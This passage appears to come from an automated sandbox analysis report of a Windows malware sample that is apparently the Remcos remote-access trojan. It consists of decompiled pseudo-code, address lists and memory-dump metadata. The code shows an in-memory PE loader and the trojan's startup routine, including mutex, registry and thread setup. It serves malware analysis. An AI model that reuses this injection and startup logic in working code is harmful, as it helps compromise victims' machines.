                                    							_t127 = memcpy(_v16 +  *((intOrPtr*)(_t236 + 0xc)), _a4 + _t197,  *(_t236 + 0x10));
                                    							_t274 = _t274 + 0xc;
                                    							_t257 = _t257;
                                    						}
                                    					} while (_t127 != 1);
                                    					_t199 = _v16 - _v8;
                                    					if(_t199 == 0) {
                                    						L24:
                                    						_t182 = _v16;
                                    						_v80 = _v80 + _v84;
                                    						_t129 =  *[fs:0x30];
                                    						if(_v72 == 0) {
                                    							 *((intOrPtr*)(_t129 + 8)) = _t182;
                                    						}
                                    						_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0xc)) + 0xc));
                                    						_t258 = _t131;
                                    						while( *((intOrPtr*)(_t131 + 0x18)) != _v84 ||  *((intOrPtr*)(_t131 + 0x1c)) != _v80 ||  *((intOrPtr*)(_t131 + 0x20)) != _v76) {
                                    							if( *_t131 == _t258) {
                                    								L33:
                                    								_t161 = _v380;
                                    								if(_t161 == 0) {
                                    									L46:
                                    									_t162 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                    									_v116 = _t162;
                                    									do {
                                    										_t202 =  *((intOrPtr*)(_t162 + 0x18));
                                    										if(_t202 == _v84) {
                                    											goto L60;
                                    										}
                                    										_t134 = _v128(4, _t202);
                                    										_t203 = _t202;
                                    										if(_t134 != 0) {
                                    											goto L60;
                                    										}
                                    										_t239 =  *((intOrPtr*)(_t203 +  *((intOrPtr*)(_t203 + 0x3c)) + 0x80));
                                    										if(_t239 == 0) {
                                    											goto L60;
                                    										}
                                    										_t240 = _t239 + _t203;
                                    										while(1) {
                                    											_push(_t240);
                                    											asm("repe scasd");
                                    											_t241 = 5;
                                    											if(0 == 0) {
                                    												goto L60;
                                    											}
                                    											_t260 =  *((intOrPtr*)(_t241 + 0x10)) +  *((intOrPtr*)(_t162 + 0x18));
                                    											_t138 =  *_t260 - _v84;
                                    											if(_t138 < 0 || _t138 > _v76) {
                                    												L54:
                                    												_t240 = _t241 + 0x14;
                                    												continue;
                                    											} else {
                                    												_v124(_t260,  &_v160, 0x1c);
                                    												_t142 = _v120(_v160, _v148, 4,  &_v140);
                                    												if(_t142 == 0) {
                                    													goto L60;
                                    												}
                                    												_push(_t241);
                                    												while(1) {
                                    													asm("lodsd");
                                    													if(_t142 == 0) {
                                    														break;
                                    													}
                                    													_t142 = _t142 - _v84 + _v16;
                                    													asm("stosd");
                                    												}
                                    												_v120(_v160, _v148, _v140,  &_v136);
                                    												_pop(_t241);
                                    												goto L54;
                                    											}
                                    										}
                                    										L60:
                                    										_t162 =  *_t162;
                                    									} while (_t162 != _v116);
                                    									_t116 = _v468 + _v16;
                                    									goto L62;
                                    								}
                                    								_t261 = _v16;
                                    								_t163 = _t161 + _t261;
                                    								while(1) {
                                    									_t146 =  *((intOrPtr*)(_t163 + 0xc));
                                    									if(_t146 == 0) {
                                    										goto L46;
                                    									}
                                    									_v64 =  *((intOrPtr*)(_t163 + 0x10)) + _t261;
                                    									_t186 =  *_t163;
                                    									if(_t186 == 0) {
                                    										_t186 =  *((intOrPtr*)(_t163 + 0x10));
                                    									}
                                    									_v68 = _t186 + _t261;
                                    									_t116 = LoadLibraryA(_t146 + _t261); // executed
                                    									if(_t116 == 0) {
                                    										goto L62;
                                    									} else {
                                    										_t243 = _t116;
                                    										while(1) {
                                    											_t204 =  *_v68;
                                    											if(_t204 == 0) {
                                    												break;
                                    											}
                                    											if((_t204 & 0x80000000) == 0) {
                                    												_t207 = _t204 + _t261 + 2;
                                    											} else {
                                    												_t207 = _t204 & 0x7fffffff;
                                    											}
                                    											 *_v64 =  *_a8(_t243, _t207);
                                    											_v64 = _v64 + 4;
                                    											_v68 =  &(_v68[1]);
                                    										}
                                    										_t163 = _t163 + 0x14;
                                    										continue;
                                    									}
                                    								}
                                    								goto L46;
                                    							}
                                    							_t131 =  *_t131;
                                    						}
                                    						 *((intOrPtr*)(_t131 + 0x18)) = _t182;
                                    						 *((intOrPtr*)(_t131 + 0x1c)) = _t182 + _v468;
                                    						 *((intOrPtr*)(_t131 + 0x20)) = _v428;
                                    						goto L33;
                                    					}
                                    					_t151 = _v16;
                                    					_t166 =  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t151 + 0x3c)) + 0xa0));
                                    					if(_t166 == 0) {
                                    						goto L24;
                                    					}
                                    					_t167 = _t166 + _t151;
                                    					while( *((intOrPtr*)(_t167 + 4)) != 0) {
                                    						_t153 =  *(_t167 + 8) & 0x0000ffff;
                                    						_t264 = _v16 +  *_t167 + (_t153 & 0x00000fff);
                                    						_t199 = _t199;
                                    						_t155 = (_t153 >> 0xc) - 1;
                                    						if(_t155 != 0) {
                                    							_t156 = _t155 - 1;
                                    							if(_t156 != 0) {
                                    								if(_t156 == 1) {
                                    									 *_t264 =  *_t264 + _t199;
                                    								}
                                    								L23:
                                    								asm("loop 0xffffffce");
                                    								_t167 = _t167 +  *((intOrPtr*)(_t167 + 4));
                                    								continue;
                                    							}
                                    							_t158 = _t199 & 0x0000ffff;
                                    							L20:
                                    							 *_t264 =  *_t264 + _t158;
                                    							goto L23;
                                    						}
                                    						_t158 = _t199 >> 0x10;
                                    						goto L20;
                                    					}
                                    					goto L24;
                                    				}
                                    				_t116 = _t160->i(_t122, _t175, 0x1000, 0x40);
                                    				if(_t116 == 0) {
                                    					goto L62;
                                    				}
                                    				goto L8;
                                    			}
                                    0x1059112f
                                    0x10591137
                                    0x1059113a
                                    0x1059113b
                                    0x10591146
                                    0x1059114b
                                    0x10591150
                                    0x10591150
                                    0x10591153
                                    0x1059115c
                                    0x1059115f
                                    0x10591162
                                    0x10591164
                                    0x10591166
                                    0x1059116c
                                    0x1059117c
                                    0x10591184
                                    0x10591186
                                    0x1059118e
                                    0x105911a8
                                    0x105911aa
                                    0x105911ad
                                    0x105911c5
                                    0x105911c7
                                    0x105911ca
                                    0x105911ce
                                    0x105914d9
                                    0x105914e0
                                    0x105914e0
                                    0x105911ed
                                    0x105911ef
                                    0x105911f2
                                    0x105911f7
                                    0x00000000
                                    0x00000000
                                    0x10591213
                                    0x10591215
                                    0x10591218
                                    0x1059121d
                                    0x00000000
                                    0x00000000
                                    0x10591239
                                    0x1059123b
                                    0x1059123e
                                    0x10591243
                                    0x00000000
                                    0x00000000
                                    0x10591249
                                    0x10591258
                                    0x10591259
                                    0x10591259
                                    0x1059125b
                                    0x1059125c
                                    0x1059125f
                                    0x10591262
                                    0x10591265
                                    0x10591272
                                    0x10591274
                                    0x10591277
                                    0x1059128c
                                    0x1059128c
                                    0x10591291
                                    0x1059129d
                                    0x1059129d
                                    0x1059129f
                                    0x105912a3
                                    0x105912b3
                                    0x105912b3
                                    0x105912b9
                                    0x105912ba
                                    0x105912ba
                                    0x105912bc
                                    0x105912bd
                                    0x105912c2
                                    0x105912d5
                                    0x105912d5
                                    0x105912d7
                                    0x105912d7
                                    0x105912d8
                                    0x105912de
                                    0x105912e1
                                    0x1059133f
                                    0x1059133f
                                    0x10591345
                                    0x10591348
                                    0x10591353
                                    0x10591355
                                    0x10591355
                                    0x1059135b
                                    0x1059135e
                                    0x10591360
                                    0x10591391
                                    0x10591397
                                    0x10591397
                                    0x1059139f
                                    0x1059140d
                                    0x10591417
                                    0x1059141a
                                    0x1059141d
                                    0x1059141d
                                    0x10591423
                                    0x00000000
                                    0x00000000
                                    0x1059142d
                                    0x10591430
                                    0x10591433
                                    0x00000000
                                    0x00000000
                                    0x1059143e
                                    0x10591446
                                    0x00000000
                                    0x00000000
                                    0x10591448
                                    0x1059144a
                                    0x1059144c
                                    0x10591450
                                    0x10591452
                                    0x10591453
                                    0x00000000
                                    0x00000000
                                    0x10591458
                                    0x1059145d
                                    0x10591460
                                    0x10591467
                                    0x10591467
                                    0x00000000
                                    0x1059146c
                                    0x10591476
                                    0x1059148e
                                    0x10591493
                                    0x00000000
                                    0x00000000
                                    0x10591495
                                    0x10591498
                                    0x10591498
                                    0x1059149b
                                    0x00000000
                                    0x00000000
                                    0x105914a0
                                    0x105914a3
                                    0x105914a3
                                    0x105914bf
                                    0x105914c2
                                    0x00000000
                                    0x105914c2
                                    0x10591460
                                    0x105914c5
                                    0x105914c5
                                    0x105914c7
                                    0x105914d6
                                    0x00000000
                                    0x105914d6
                                    0x105913a1
                                    0x105913a4
                                    0x105913a6
                                    0x105913a6
                                    0x105913ab
                                    0x00000000
                                    0x00000000
                                    0x105913b2
                                    0x105913b5
                                    0x105913b9
                                    0x105913bb
                                    0x105913bb
                                    0x105913c0
                                    0x105913c9
                                    0x105913cd
                                    0x00000000
                                    0x105913d3
                                    0x105913d3
                                    0x105913d5
                                    0x105913d8
                                    0x105913dc
                                    0x00000000
                                    0x00000000
                                    0x105913e4
                                    0x105913f1
                                    0x105913e6
                                    0x105913e6
                                    0x105913e6
                                    0x105913fc
                                    0x105913fe
                                    0x10591402
                                    0x10591402
                                    0x10591408
                                    0x00000000
                                    0x10591408
                                    0x105913cd
                                    0x00000000
                                    0x105913a6
                                    0x10591393
                                    0x10591393
                                    0x10591378
                                    0x10591381
                                    0x1059138a
                                    0x00000000
                                    0x1059138a
                                    0x105912e3
                                    0x105912eb
                                    0x105912f3
                                    0x00000000
                                    0x00000000
                                    0x105912f5
                                    0x105912f7
                                    0x10591306
                                    0x10591319
                                    0x1059131b
                                    0x1059131c
                                    0x1059131d
                                    0x10591326
                                    0x10591327
                                    0x10591332
                                    0x10591334
                                    0x10591334
                                    0x10591336
                                    0x10591338
                                    0x1059133a
                                    0x00000000
                                    0x1059133a
                                    0x10591329
                                    0x1059132c
                                    0x1059132c
                                    0x00000000
                                    0x1059132c
                                    0x10591321
                                    0x00000000
                                    0x10591321
                                    0x00000000
                                    0x105912f7
                                    0x10591282
                                    0x10591286
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • LoadLibraryA.KERNELBASE(00079038,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105913C9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: e8295adf4cf91ce3d1e71315a4843ea83c5309d34d73cf038304c1049df78913
                                    • Instruction ID: e1892e3f732a2c009111406d2261d1ca8ffd7ecb4d6a59bc074b5b7fbd1b7348
                                    • Opcode Fuzzy Hash: e8295adf4cf91ce3d1e71315a4843ea83c5309d34d73cf038304c1049df78913
                                    • Instruction Fuzzy Hash: DBC18C71A00225AFDB14CF69CC84B9EBBB5FF88350F258569E809AB655D730ED01CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,006FF5A8), ref: 006FF8BE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: e08711f12c8ae5973016edb18573fd2e6fc80f4e70d009887161a4e4e44f31f8
                                    • Instruction ID: 30f007f60a4d484de15dac7affe268e41558ef4939b15f8872c12dffd39e50b4
                                    • Opcode Fuzzy Hash: e08711f12c8ae5973016edb18573fd2e6fc80f4e70d009887161a4e4e44f31f8
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E006DC2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                                    				char _v524;
                                    				char _v700;
                                    				char _v720;
                                    				char _v724;
                                    				char _v728;
                                    				char _v744;
                                    				char _v756;
                                    				char _v760;
                                    				char _v772;
                                    				struct _SECURITY_ATTRIBUTES* _v776;
                                    				signed int _v780;
                                    				char _v784;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t71;
                                    				void* _t78;
                                    				void** _t86;
                                    				void* _t90;
                                    				CHAR* _t93;
                                    				long _t95;
                                    				int _t97;
                                    				char _t100;
                                    				void* _t101;
                                    				void* _t105;
                                    				void* _t121;
                                    				void* _t122;
                                    				void* _t129;
                                    				char _t135;
                                    				char* _t137;
                                    				signed char* _t139;
                                    				signed char* _t141;
                                    				void* _t144;
                                    				void* _t146;
                                    				void* _t163;
                                    				intOrPtr _t165;
                                    				void* _t166;
                                    				intOrPtr _t182;
                                    				intOrPtr* _t185;
                                    				void* _t187;
                                    				void* _t193;
                                    				char* _t196;
                                    				void* _t199;
                                    				char* _t203;
                                    				void* _t210;
                                    				signed short* _t214;
                                    				void* _t215;
                                    				void* _t216;
                                    				signed int _t217;
                                    				CHAR* _t224;
                                    				void* _t226;
                                    				char* _t229;
                                    				char* _t231;
                                    				intOrPtr* _t233;
                                    				void* _t235;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t244;
                                    				void* _t246;
                                    				void* _t254;
                                    				void* _t265;
                                    				void* _t268;
                                    				struct _SECURITY_ATTRIBUTES* _t269;
                                    				int _t272;
                                    				char* _t360;
                                    				signed int _t382;
                                    				signed int _t386;
                                    				int _t388;
                                    				signed int _t394;
                                    				signed int _t397;
                                    				intOrPtr _t423;
                                    				void* _t433;
                                    				void* _t435;
                                    				signed int _t452;
                                    				void* _t455;
                                    				char* _t461;
                                    				void* _t462;
                                    				char* _t465;
                                    				void* _t467;
                                    				void* _t472;
                                    				char* _t477;
                                    				intOrPtr* _t481;
                                    				void* _t484;
                                    				void* _t485;
                                    				void* _t486;
                                    				signed int _t492;
                                    				void* _t495;
                                    				void* _t496;
                                    				void* _t497;
                                    				void* _t499;
                                    				void* _t501;
                                    				void* _t502;
                                    				void* _t506;
                                    
                                    				_t444 = __edx;
                                    				 *0x73bd28 = _a4;
                                    				_push(_t268);
                                    				E006DCC55( &_v724, __edx, __eflags);
                                    				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
                                    				E006D20EC(_t268, _t495, __edx, __eflags, 0x73c59c);
                                    				_t496 = _t495 - 0x18;
                                    				E006D20EC(_t268, _t496, __edx, __eflags,  &_v728);
                                    				_t71 = E006E7478( &_v756, __edx);
                                    				_t497 = _t496 + 0x30;
                                    				E006DD458(__edx, _t71);
                                    				E006D1E74( &_v760, __edx);
                                    				_t284 = _a12;
                                    				if( *_a12 != 0x2d) {
                                    					L6:
                                    					_t461 = 0x73c578;
                                    					__eflags =  *((char*)(E006D1F95(E006D1E49(0x73c578, _t444, __eflags, 3))));
                                    					 *0x73bb01 = __eflags != 0;
                                    					_t78 = E006D5343(_t268,  &_v756, E006D75E6( &_v780, "Software\\", __eflags, E006D1E49(0x73c578, _t444, __eflags, 0xe)), 0x73c578, __eflags, "\\");
                                    					_t471 = 0x73c518;
                                    					E006D1FD1(0x73c518, _t77, 0x73c518, _t78);
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					E006D5A0B(_t268, 0x73c5cc, "Exe");
                                    					_t269 = 0;
                                    					E006D1E49(0x73c578, _t77, __eflags, 0x32);
                                    					__eflags =  *(E006D5220(0));
                                    					 *0x73bd4e = __eflags != 0;
                                    					E006D1E49(0x73c578, _t77, __eflags, 0x33);
                                    					_t86 = E006D5220(0);
                                    					__eflags =  *_t86;
                                    					 *0x73bd4f =  *_t86 != 0;
                                    					__eflags =  *0x73bd4e - _t269; // 0x0
                                    					if(__eflags == 0) {
                                    						L8:
                                    						_v776 = _t269;
                                    						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
                                    						__eflags = _t472;
                                    						if(_t472 != 0) {
                                    							WaitForSingleObject(_t472, 0xea60);
                                    							CloseHandle(_t472);
                                    						}
                                    						_t447 = E006D1F95(0x73c518); // executed
                                    						_t90 = E006E0885(_t89, "Inj",  &_v776); // executed
                                    						__eflags = _t90;
                                    						if(__eflags != 0) {
                                    							_t447 = E006D1F95(0x73c518);
                                    							E006E0CE2(_t259, __eflags, "Inj");
                                    						}
                                    						E006D1FAD(0x73c548, E006D1E49(_t461, _t447, __eflags, 0xe));
                                    						_t93 = E006D1F95(0x73c548);
                                    						_t462 = 0;
                                    						_t272 = 1;
                                    						CreateMutexA(0, 1, _t93); // executed
                                    						_t95 = GetLastError();
                                    						__eflags = _t95 - 0xb7;
                                    						if(_t95 == 0xb7) {
                                    							L45:
                                    							E006D1FC7();
                                    							_t97 = _t272;
                                    							goto L5;
                                    						} else {
                                    							E006DCD09();
                                    							GetModuleFileNameW(0, 0x73bb08, 0x104);
                                    							_t100 = E006E7614(0x73c548);
                                    							_push(0x73c548);
                                    							_t448 = 0x80000002;
                                    							 *0x73beb4 = _t100;
                                    							_t101 = E006E08E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
                                    							_t499 = _t497 + 0xc;
                                    							E006D1FD1(0x73c5b4, 0x80000002, 0x73c5b4, _t101);
                                    							E006D1FC7();
                                    							__eflags =  *0x73beb4;
                                    							if( *0x73beb4 == 0) {
                                    								_push(" (32 bit)");
                                    							} else {
                                    								_push(" (64 bit)");
                                    							}
                                    							E006D5A02(_t272, 0x73c5b4, _t462);
                                    							_t105 =  *0x73bd20; // 0x0
                                    							__eflags = _t105;
                                    							if(_t105 != 0) {
                                    								 *0x73a9d0 =  *_t105();
                                    							}
                                    							_t477 = 0x73c578;
                                    							__eflags = _v776 - _t462;
                                    							if(__eflags == 0) {
                                    								_t433 = E006D1E49(0x73c578, _t448, __eflags, 0x2e);
                                    								__eflags =  *((char*)(E006D1F95(_t433)));
                                    								if(__eflags != 0) {
                                    									__eflags =  *0x73bd20 - _t462; // 0x0
                                    									if(__eflags != 0) {
                                    										__eflags =  *0x73a9d0 - _t462; // 0x2
                                    										if(__eflags == 0) {
                                    											_t448 = E006D1F95(0x73c518);
                                    											_t254 = E006E083B(0x73c518, _t253, "origmsc");
                                    											_pop(_t435);
                                    											__eflags = _t254;
                                    											if(__eflags == 0) {
                                    												E006D5F77(_t272, _t435, _t448);
                                    											}
                                    										} else {
                                    											_push(_t433);
                                    											_push(_t433);
                                    											__eflags = E006DA713() - 0xffffffff;
                                    											if(__eflags == 0) {
                                    												E006D6071(__eflags);
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x27))));
                                    							if(__eflags != 0) {
                                    								E006DD3F7();
                                    							}
                                    							E006D9DC9(_t272, 0x73c4e8, E006D1F95(E006D1E49(_t477, _t448, __eflags, 0xb)));
                                    							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 4))));
                                    							 *0x73bb02 = __eflags != 0;
                                    							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 5))));
                                    							 *0x73bafb = __eflags != 0;
                                    							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 8))));
                                    							 *0x73bb00 = __eflags != 0;
                                    							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 3))));
                                    							if(__eflags != 0) {
                                    								_t240 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x30));
                                    								_t25 = _t240 + 2; // 0x2
                                    								_t448 = _t25;
                                    								do {
                                    									_t423 =  *_t240;
                                    									_t240 = _t240 + 2;
                                    									__eflags = _t423 - _t462;
                                    								} while (_t423 != _t462);
                                    								__eflags = _t240 - _t448;
                                    								if(__eflags != 0) {
                                    									_t244 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 9));
                                    									_t246 = E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 0x30));
                                    									_t448 =  *_t244;
                                    									E006D1EFA(0x73c530,  *_t244, _t244, E006E805B( &_v780,  *_t244, _t246));
                                    									E006D1EF0();
                                    									_t477 = 0x73c578;
                                    								}
                                    							}
                                    							__eflags = _v776 - _t462;
                                    							if(_v776 != _t462) {
                                    								E00701F00(_t462,  &_v524, _t462, 0x208);
                                    								_t121 = E006D2489();
                                    								_t122 = E006D1F95(0x73c560);
                                    								_t449 = E006D1F95(0x73c518);
                                    								E006E0A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                                    								_t501 = _t499 + 0x20;
                                    								E006D9DC9(_t272, 0x73c500,  &_v524);
                                    								_t465 = 0x73c578;
                                    								goto L47;
                                    							} else {
                                    								__eflags =  *0x73bb01;
                                    								if(__eflags == 0) {
                                    									E006D9DC9(_t272, 0x73c500, 0x73bb08);
                                    								} else {
                                    									_t229 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x1e));
                                    									_t231 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0xc));
                                    									_t233 = E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 9));
                                    									__eflags =  *_t229;
                                    									__eflags =  *_t231;
                                    									_t477 = 0x73c578;
                                    									_t235 = E006D1F95(E006D1E49(0x73c578, _t448,  *_t231, 0xa));
                                    									E006DA987( *_t233, E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
                                    									_t499 = _t499 + 0xc;
                                    									_t272 = 1;
                                    									_t462 = 0;
                                    								}
                                    								_t210 = E006D2489();
                                    								_t452 = 2;
                                    								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
                                    								_push(_t394);
                                    								_v780 = _t394;
                                    								_t486 = E006FF4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
                                    								__eflags = _t486;
                                    								if(_t486 == 0) {
                                    									_t486 = _t462;
                                    								} else {
                                    									E00701F00(_t462, _t486, _t462, _v780);
                                    									_t499 = _t499 + 0xc;
                                    								}
                                    								_t214 = E006D1EEB(0x73c500);
                                    								_t455 = _t486 - _t214;
                                    								__eflags = _t455;
                                    								_t467 = 2;
                                    								do {
                                    									_t397 =  *_t214 & 0x0000ffff;
                                    									 *(_t214 + _t455) = _t397;
                                    									_t214 = _t214 + _t467;
                                    									__eflags = _t397;
                                    								} while (_t397 != 0);
                                    								_push(_t397);
                                    								_t215 = E006D2489();
                                    								_t216 = E006D1F95(0x73c560);
                                    								_t217 = E006D2489();
                                    								E006E0C80(E006D1F95(0x73c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215);
                                    								E006FF4CF(_t486);
                                    								_t501 = _t499 + 0x1c;
                                    								_t465 = 0x73c578;
                                    								E006D1E49(0x73c578, _t219, __eflags, 0xd);
                                    								_t449 = "0";
                                    								__eflags = E006DEAD9(__eflags);
                                    								if(__eflags == 0) {
                                    									L47:
                                    									_push(_t272);
                                    									_t129 = E006D1F95(E006D1E49(_t465, _t449, __eflags, 0x34));
                                    									_t502 = _t501 - 0x18;
                                    									E006D2084(_t272, _t502, _t129);
                                    									_push("licence");
                                    									_t450 = E006D1F95(0x73c518);
                                    									E006E0AA7(0x73c518, _t131);
                                    									_t497 = _t502 + 0x20;
                                    									_t135 = E00706769(_t133, E006D1F95(E006D1E49(_t465, _t131, __eflags, 0x28)));
                                    									 *0x73bb03 = _t135;
                                    									__eflags = _t135 - 2;
                                    									if(_t135 != 2) {
                                    										__eflags = _t135 - _t272;
                                    										if(__eflags == 0) {
                                    											_t388 = 0;
                                    											__eflags = 0;
                                    											goto L51;
                                    										}
                                    									} else {
                                    										_t388 = _t272;
                                    										L51:
                                    										E006E8F59(_t272, _t388, _t450);
                                    										__eflags = 0;
                                    										CreateThread(0, 0, E006E8D28, 0, 0, 0);
                                    									}
                                    									_t137 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0x37));
                                    									_t139 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0x10));
                                    									_t141 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0xf));
                                    									__eflags =  *_t137;
                                    									_t471 = 0x73c578;
                                    									_t144 = E00706769(_t142, E006D1F95(E006D1E49(0x73c578, _t450,  *_t137, 0x36)));
                                    									_t146 = E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x11));
                                    									E006D846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                                    									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x14)))) - 1;
                                    									if(__eflags != 0) {
                                    										_t461 = CreateThread;
                                    									} else {
                                    										_t199 = 2;
                                    										_t485 = E006FF218(_t450, 0x73c578, __eflags, _t199);
                                    										 *_t485 = 0;
                                    										_t386 = E006D1E49(0x73c578, _t450, __eflags, 0x35);
                                    										_t203 = E006D1F95(_t386);
                                    										_t461 = CreateThread;
                                    										__eflags =  *_t203;
                                    										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
                                    										CreateThread(0, 0, E006E5938, _t485, 0, 0);
                                    										_t471 = 0x73c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x16)))) - 1;
                                    									if(__eflags == 0) {
                                    										_t193 = 2;
                                    										_t484 = E006FF218(_t450, _t471, __eflags, _t193);
                                    										 *_t484 = 1;
                                    										_t382 = E006D1E49(0x73c578, _t450, __eflags, 0x35);
                                    										_t196 = E006D1F95(_t382);
                                    										__eflags =  *_t196;
                                    										__eflags = 0;
                                    										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
                                    										CreateThread(0, 0, E006E5938, _t484, 0, 0);
                                    										_t471 = 0x73c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x23)))) - 1;
                                    									if(__eflags == 0) {
                                    										 *0x73ba75 = 1;
                                    										_t185 = E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x25));
                                    										_t187 = E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x26));
                                    										_t450 =  *_t185;
                                    										E006D1EFA(0x73c0e0,  *_t185, _t185, E006E800F( &_v780,  *_t185, _t187));
                                    										E006D1EF0();
                                    										__eflags = 0;
                                    										CreateThread(0, 0, E006D1BCD, 0, 0, 0);
                                    										_t471 = 0x73c578;
                                    									}
                                    									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x2b)))) - 1;
                                    									if(__eflags == 0) {
                                    										_t471 = E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x2c));
                                    										_t182 = E00706769(_t180, E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x2d)));
                                    										__eflags =  *_t471;
                                    										_t450 = _t182;
                                    										__eflags =  *_t471 != 0;
                                    										E006DA679(_t182);
                                    									}
                                    									E006D1EFA(0x73c584, _t450, _t471, E006E6D9E( &_v772, _t461, __eflags));
                                    									_t360 =  &_v776;
                                    									E006D1EF0();
                                    									_t163 =  *0x73bd14; // 0x0
                                    									_t269 = 0;
                                    									__eflags = _t163;
                                    									if(_t163 != 0) {
                                    										 *_t163(0);
                                    									}
                                    									CreateThread(_t269, _t269, E006DD0B5, _t269, _t269, _t269);
                                    									__eflags =  *0x73bd4e;
                                    									if( *0x73bd4e != 0) {
                                    										CreateThread(_t269, _t269, E006DFAC7, _t269, _t269, _t269);
                                    									}
                                    									__eflags =  *0x73bd4f;
                                    									if( *0x73bd4f != 0) {
                                    										CreateThread(_t269, _t269, E006DFFE5, _t269, _t269, _t269);
                                    									}
                                    									_t165 =  *0x73a9d0; // 0x2
                                    									_t166 = _t165 - _t269;
                                    									__eflags = _t166;
                                    									if(__eflags == 0) {
                                    										goto L71;
                                    									} else {
                                    										__eflags = _t166 - 1;
                                    										if(__eflags == 0) {
                                    											_push("Administrator");
                                    											goto L72;
                                    										}
                                    									}
                                    									goto L73;
                                    								} else {
                                    									_t224 = E006D1E49(0x73c578, "0", __eflags, 0xd);
                                    									_t506 = _t501 - 0x18;
                                    									_t449 = _t224;
                                    									E006E72DA(_t506, _t224);
                                    									_t226 = E006DCE44(__eflags);
                                    									_t501 = _t506 + 0x18;
                                    									__eflags = _t226 - _t272;
                                    									if(__eflags != 0) {
                                    										goto L47;
                                    									} else {
                                    										_t272 = 3;
                                    										goto L45;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						_v780 = 0;
                                    						_t265 = E006E0885(E006D1F95(0x73c518), "WD",  &_v780);
                                    						__eflags = _t265;
                                    						if(_t265 != 0) {
                                    							E006E0CE2(E006D1F95(0x73c518), __eflags, "WD");
                                    							E006DFD95();
                                    							L71:
                                    							_push("User");
                                    							L72:
                                    							E006D75C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E006D2084(_t269,  &_v776));
                                    							E006D2084(_t269, _t497 - 4, "[Info]");
                                    							E006E6C80(_t269, _t461);
                                    							_t360 =  &_v784;
                                    							E006D1FC7();
                                    							L73:
                                    							E006E1929();
                                    							asm("int3");
                                    							_push(_t471);
                                    							_t481 = _t360 + 0x68;
                                    							E006DD515(_t481, __eflags);
                                    							_t284 = _t481;
                                    							 *_t284 = 0x730788;
                                    							 *_t284 = 0x730744;
                                    							return E007004F6(_t284);
                                    						} else {
                                    							goto L8;
                                    						}
                                    					}
                                    				} else {
                                    					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
